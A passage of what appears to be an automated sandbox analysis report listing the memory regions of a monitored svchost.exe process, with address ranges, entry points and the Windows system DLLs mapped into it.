0x0 region_type = private name = "private_0x0000000002650000" filename = "" Region: id = 2089 start_va = 0x2770000 end_va = 0x27effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002770000" filename = "" Region: id = 2090 start_va = 0x2810000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002810000" filename = "" Region: id = 2091 start_va = 0x2890000 end_va = 0x290ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002890000" filename = "" Region: id = 2092 start_va = 0x2910000 end_va = 0x298ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 2093 start_va = 0x2990000 end_va = 0x2a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002990000" filename = "" Region: id = 2094 start_va = 0x2a10000 end_va = 0x2a8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a10000" filename = "" Region: id = 2095 start_va = 0x2a90000 end_va = 0x2b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a90000" filename = "" Region: id = 2096 start_va = 0x2b30000 end_va = 0x2baffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b30000" filename = "" Region: id = 2097 start_va = 0x2bc0000 end_va = 0x2c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bc0000" filename = "" Region: id = 2098 start_va = 0x2c40000 end_va = 0x2e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c40000" filename = "" Region: id = 2099 start_va = 0x2e40000 end_va = 0x2f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e40000" filename = "" Region: id = 2100 start_va = 0x2fa0000 end_va = 0x301ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002fa0000" filename = "" Region: id = 2101 start_va = 0x3020000 end_va = 0x311ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003020000" filename = "" Region: id = 2102 start_va = 0x3120000 end_va = 0x319ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003120000" filename = "" Region: id = 2103 start_va = 0x31e0000 end_va = 0x325ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031e0000" filename = "" Region: id = 2104 start_va = 0x3290000 end_va = 0x330ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003290000" filename = "" Region: id = 2105 start_va = 0x3390000 end_va = 0x340ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003390000" filename = "" Region: id = 2106 start_va = 0x35a0000 end_va = 0x361ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035a0000" filename = "" Region: id = 2107 start_va = 0x3780000 end_va = 0x37fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003780000" filename = "" Region: id = 2108 start_va = 0x77060000 end_va = 0x77159fff monitored = 0 entry_point = 0x7707a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2109 start_va = 0x77160000 end_va = 0x7727efff monitored = 0 entry_point = 0x77175340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2110 start_va = 0x77280000 end_va = 0x77428fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2111 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2112 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2113 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2114 start_va = 0xffd70000 end_va = 0xffd7afff monitored = 0 entry_point = 0xffd7246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 2115 start_va = 0x7fef6fd0000 end_va = 0x7fef70bdfff monitored = 0 entry_point = 0x7fef6fd12a0 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 2116 start_va = 0x7fef8bf0000 end_va = 0x7fef8c60fff monitored = 0 entry_point = 0x7fef8c351d0 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 2117 start_va = 0x7fef8ee0000 end_va = 0x7fef8ef1fff monitored = 0 entry_point = 0x7fef8ee89d0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 2118 start_va = 0x7fef8f00000 end_va = 0x7fef8fb4fff monitored = 0 entry_point = 0x7fef8f7cf80 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 2119 start_va = 0x7fef9270000 end_va = 0x7fef927bfff monitored = 0 entry_point = 0x7fef927602c region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 2120 start_va = 0x7fef9510000 end_va = 0x7fef9569fff monitored = 0 entry_point = 0x7fef954dde0 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 2121 start_va = 0x7fef9570000 end_va = 0x7fef9590fff monitored = 0 entry_point = 0x7fef95803b0 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 2122 start_va = 0x7fef95a0000 end_va = 0x7fef95b9fff monitored = 0 entry_point = 0x7fef95b3fbc region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 2123 start_va = 0x7fef95c0000 end_va = 0x7fef95d2fff monitored = 0 entry_point = 0x7fef95c1d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 2124 start_va = 0x7fef95e0000 end_va = 0x7fef964afff monitored = 0 entry_point = 0x7fef9624344 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 2125 start_va = 0x7fef9650000 end_va = 0x7fef96b1fff monitored = 0 entry_point = 0x7fef968bd80 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 2126 start_va = 0x7fef96c0000 end_va = 0x7fef96c7fff monitored = 0 entry_point = 0x7fef96c1414 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 2127 start_va = 0x7fef96d0000 end_va = 0x7fef97fbfff monitored = 0 entry_point = 0x7fef9780ef0 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 2128 start_va = 0x7fef9800000 end_va = 0x7fef9873fff monitored = 0 entry_point = 0x7fef98066f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 2129 start_va = 0x7fef9880000 end_va = 0x7fef9903fff monitored = 0 entry_point = 0x7fef98d1118 region_type = mapped_file name = "netcfgx.dll" filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll") Region: id = 2130 start_va = 0x7fef9910000 end_va = 0x7fef9928fff monitored = 0 entry_point = 0x7fef9911104 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 2131 start_va = 0x7fef9930000 end_va = 0x7fef993dfff monitored = 0 entry_point = 0x7fef9935500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2132 start_va = 0x7fef9940000 end_va = 0x7fef998ffff monitored = 0 entry_point = 0x7fef9941190 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 2133 start_va = 0x7fef9990000 end_va = 0x7fef9997fff monitored = 0 entry_point = 0x7fef9991020 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 2134 start_va = 0x7fef99a0000 end_va = 0x7fef99c6fff monitored = 0 entry_point = 0x7fef99a11a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 2135 start_va = 0x7fef99d0000 end_va = 0x7fef9a16fff monitored = 0 entry_point = 0x7fef99d1040 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 2136 start_va = 0x7fef9a20000 end_va = 0x7fef9af2fff monitored = 0 entry_point = 0x7fef9a98b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 2137 start_va = 0x7fef9b40000 end_va = 0x7fef9b81fff monitored = 0 entry_point = 0x7fef9b417e4 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 2138 start_va = 0x7fef9b90000 end_va = 0x7fef9c21fff monitored = 0 entry_point = 0x7fef9c051ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 2139 start_va = 0x7fef9c50000 end_va = 0x7fef9c74fff monitored = 0 entry_point = 0x7fef9c68c54 region_type = mapped_file name = "browser.dll" filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll") Region: id = 2140 start_va = 0x7fef9c80000 end_va = 0x7fef9c96fff monitored = 0 entry_point = 0x7fef9c81060 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 2141 start_va = 0x7fef9ca0000 end_va = 0x7fef9e4ffff monitored = 0 entry_point = 0x7fef9ca1010 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 2142 start_va = 0x7fef9e50000 end_va = 0x7fef9e8cfff monitored = 0 entry_point = 0x7fef9e51070 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 2143 start_va = 0x7fef9ed0000 end_va = 0x7fef9f46fff monitored = 0 entry_point = 0x7fef9f0e7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 2144 start_va = 0x7fef9f50000 end_va = 0x7fef9f89fff monitored = 0 entry_point = 0x7fef9f6d020 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 2145 start_va = 0x7fefa6d0000 end_va = 0x7fefa746fff monitored = 0 entry_point = 0x7fefa6dafd0 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 2146 start_va = 0x7fefa750000 end_va = 0x7fefa759fff monitored = 0 entry_point = 0x7fefa75260c region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 2147 start_va = 0x7fefa760000 end_va = 0x7fefa871fff monitored = 0 entry_point = 0x7fefa77f354 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 2148 start_va = 0x7fefa920000 end_va = 0x7fefa92efff monitored = 0 entry_point = 0x7fefa927e80 region_type = mapped_file name = "wiarpc.dll" filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll") Region: id = 2149 start_va = 0x7fefa930000 end_va = 0x7fefa938fff monitored = 0 entry_point = 0x7fefa933668 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 2150 start_va = 0x7fefa940000 end_va = 0x7fefa948fff monitored = 0 entry_point = 0x7fefa941020 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 2151 start_va = 0x7fefa950000 end_va = 0x7fefa9a5fff monitored = 0 entry_point = 0x7fefa951040 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 2152 start_va = 0x7fefa9b0000 end_va = 0x7fefaa0dfff monitored = 0 entry_point = 0x7fefa9b9024 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 2153 start_va = 0x7fefaa10000 end_va = 0x7fefaa27fff monitored = 0 entry_point = 0x7fefaa11bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 2154 start_va = 0x7fefaa30000 end_va = 0x7fefaa40fff monitored = 0 entry_point = 0x7fefaa316ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 2155 start_va = 0x7fefaac0000 end_va = 0x7fefab12fff monitored = 0 entry_point = 0x7fefaac2b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2156 start_va = 0x7fefac90000 end_va = 0x7fefaca3fff monitored = 0 entry_point = 0x7fefac93e64 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 2157 start_va = 0x7fefacb0000 end_va = 0x7fefacbafff monitored = 0 entry_point = 0x7fefacb1198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2158 start_va = 0x7fefacc0000 end_va = 0x7feface6fff monitored = 0 entry_point = 0x7fefacc98bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2159 start_va = 0x7fefad30000 end_va = 0x7fefad96fff monitored = 0 entry_point = 0x7fefad46060 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 2160 start_va = 0x7fefadb0000 end_va = 0x7fefadbafff monitored = 0 entry_point = 0x7fefadb4f8c region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 2161 start_va = 0x7fefadc0000 end_va = 0x7fefadcbfff monitored = 0 entry_point = 0x7fefadc15d8 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 2162 start_va = 0x7fefaf00000 end_va = 0x7fefaf0ffff monitored = 0 entry_point = 0x7fefaf0835c region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 2163 start_va = 0x7fefaf10000 end_va = 0x7fefaf28fff monitored = 0 entry_point = 0x7fefaf111a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 2164 start_va = 0x7fefaf30000 end_va = 0x7fefaf66fff monitored = 0 entry_point = 0x7fefaf38424 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 2165 start_va = 0x7fefafa0000 end_va = 0x7fefafb4fff monitored = 0 entry_point = 0x7fefafa60d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 2166 start_va = 0x7fefafc0000 end_va = 0x7fefb081fff monitored = 0 entry_point = 0x7fefafc101c region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 2167 start_va = 0x7fefb140000 end_va = 0x7fefb15cfff monitored = 0 entry_point = 0x7fefb142f18 region_type = mapped_file name = "mmcss.dll" filename = "\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll") Region: id = 2168 start_va = 0x7fefb160000 end_va = 0x7fefb168fff monitored = 0 entry_point = 0x7fefb161010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 2169 start_va = 0x7fefb250000 end_va = 0x7fefb27cfff monitored = 0 entry_point = 0x7fefb251010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2170 start_va = 0x7fefb280000 end_va = 0x7fefb290fff monitored = 0 entry_point = 0x7fefb2814c0 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 2171 start_va = 0x7fefb3d0000 end_va = 0x7fefb3e3fff monitored = 0 entry_point = 0x7fefb3d16b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 2172 start_va = 0x7fefb3f0000 end_va = 0x7fefb404fff monitored = 0 entry_point = 0x7fefb3f1050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2173 start_va = 0x7fefb410000 end_va = 0x7fefb41bfff monitored = 0 entry_point = 0x7fefb4118a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2174 start_va = 0x7fefb420000 end_va = 0x7fefb435fff monitored = 0 entry_point = 0x7fefb4211a0 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2175 start_va = 0x7fefb550000 end_va = 0x7fefb560fff monitored = 0 entry_point = 0x7fefb551070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2176 start_va = 0x7fefb6b0000 end_va = 0x7fefb6e4fff monitored = 0 entry_point = 0x7fefb6b1064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 2177 start_va = 0x7fefbb20000 end_va = 0x7fefbb75fff monitored = 0 entry_point = 0x7fefbb2bbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2178 start_va = 0x7fefbb80000 end_va = 0x7fefbcabfff monitored = 0 entry_point = 0x7fefbb894bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2179 start_va = 0x7fefbcb0000 end_va = 0x7fefbcccfff monitored = 0 entry_point = 0x7fefbcb1ef4 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 2180 start_va = 0x7fefbd00000 end_va = 0x7fefbef3fff monitored = 0 entry_point = 0x7fefbe8c924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 2181 start_va = 0x7fefc390000 end_va = 0x7fefc39bfff monitored = 0 entry_point = 0x7fefc391064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2182 start_va = 0x7fefc3a0000 end_va = 0x7fefc45afff monitored = 0 entry_point = 0x7fefc3a6de0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 2183 start_va = 0x7fefc460000 end_va = 0x7fefc466fff monitored = 0 entry_point = 0x7fefc4614b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 2184 start_va = 0x7fefc520000 end_va = 0x7fefc52cfff monitored = 0 entry_point = 0x7fefc521348 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 2185 start_va = 0x7fefc560000 end_va = 0x7fefc57afff monitored = 0 entry_point = 0x7fefc562068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 2186 start_va = 0x7fefc580000 end_va = 0x7fefc59dfff monitored = 0 entry_point = 0x7fefc5813b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2187 start_va = 0x7fefc5a0000 end_va = 0x7fefc5b1fff monitored = 0 entry_point = 0x7fefc5a1060 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 2188 start_va = 0x7fefc650000 end_va = 0x7fefc688fff monitored = 0 entry_point = 0x7fefc65c0f0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 2189 start_va = 0x7fefc690000 end_va = 0x7fefc699fff monitored = 0 entry_point = 0x7fefc693cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 2190 start_va = 0x7fefc7c0000 end_va = 0x7fefc806fff monitored = 0 entry_point = 0x7fefc7c1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2191 start_va = 0x7fefc8b0000 end_va = 0x7fefc8dffff monitored = 0 entry_point = 0x7fefc8b194c region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 2192 start_va = 0x7fefc8e0000 end_va = 0x7fefc93afff monitored = 0 entry_point = 0x7fefc8e6940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 2193 start_va = 0x7fefca50000 end_va = 0x7fefca56fff monitored = 0 entry_point = 0x7fefca5142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 2194 start_va = 0x7fefca60000 end_va = 0x7fefcab4fff monitored = 0 entry_point = 0x7fefca61054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 2195 start_va = 0x7fefcac0000 end_va = 0x7fefcad7fff monitored = 0 entry_point = 0x7fefcac3b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2196 start_va = 0x7fefcbd0000 end_va = 0x7fefcc01fff monitored = 0 entry_point = 0x7fefcbd144c region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 2197 start_va = 0x7fefcc10000 end_va = 0x7fefcc31fff monitored = 0 entry_point = 0x7fefcc15d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2198 start_va = 0x7fefcc90000 end_va = 0x7fefccbefff monitored = 0 entry_point = 0x7fefcc91064 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 2199 start_va = 0x7fefcce0000 end_va = 0x7fefcce9fff monitored = 0 entry_point = 0x7fefcce3b40 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 2200 start_va = 0x7fefccf0000 end_va = 0x7fefcd5cfff monitored = 0 entry_point = 0x7fefccf1010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 2201 start_va = 0x7fefcd60000 end_va = 0x7fefcd73fff monitored = 0 entry_point = 0x7fefcd64160 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 2202 start_va = 0x7fefcfc0000 end_va = 0x7fefcfe2fff monitored = 0 entry_point = 0x7fefcfc1198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 2203 start_va = 0x7fefd060000 end_va = 0x7fefd06afff monitored = 0 entry_point = 0x7fefd061030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2204 start_va = 0x7fefd090000 end_va = 0x7fefd0b4fff monitored = 0 entry_point = 0x7fefd099658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2205 start_va = 0x7fefd0c0000 end_va = 0x7fefd0fcfff monitored = 0 entry_point = 0x7fefd0c18f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2206 start_va = 0x7fefd100000 end_va = 0x7fefd10efff monitored = 0 entry_point = 0x7fefd101010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2207 start_va = 0x7fefd110000 end_va = 0x7fefd1a0fff monitored = 0 entry_point = 0x7fefd111440 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 2208 start_va = 0x7fefd1b0000 end_va = 0x7fefd1c3fff monitored = 0 entry_point = 0x7fefd1b10e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2209 start_va = 0x7fefd1d0000 end_va = 0x7fefd1defff monitored = 0 entry_point = 0x7fefd1d19b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2210 start_va = 0x7fefd270000 end_va = 0x7fefd27efff monitored = 0 entry_point = 0x7fefd271020 region_type = mapped_file name = "msasn1.dll" filename 